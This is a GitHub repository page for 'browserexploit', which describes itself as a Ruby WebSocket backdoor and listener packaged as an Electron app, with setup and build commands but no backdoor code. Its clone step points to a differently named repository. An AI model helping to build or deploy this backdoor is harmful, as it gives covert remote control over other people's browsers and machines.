Skip to content

A Simple Ruby Websocket Backdoor And Ruby Command Line Listener

Notifications You must be signed in to change notification settings

krishpranav/browserexploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

25 Commits
 
 
 
 
 
 
 
 

Repository files navigation

browserexploit

A Simple Ruby Websocket Backdoor And Ruby Command Line Listener

forthebadge

About browserexploit:

BrowserExploit is an Electron application that uses a JavaScript WebSocket Backdoor to connect to the listener.

The JavaScript backdoor in BrowserExploit can be used on all browsers that support WebSockets. 
It will not have access to the Electron API of the host computer unless the BrowserBackdoor Client application is used.

Installation

git clone https://github.com/IMcPwn/browser-backdoor
cd browser-backdoor

How to install and run the BrowserExploit client application:

cd client
npm install
npm start

How to build client executables (see here for more information):

cd client
npm install electron-packager -g
electron-packager . --all

How to run BrowserExploit:

cd server
gem install bundler
bundle install

ruby browserexploit.rb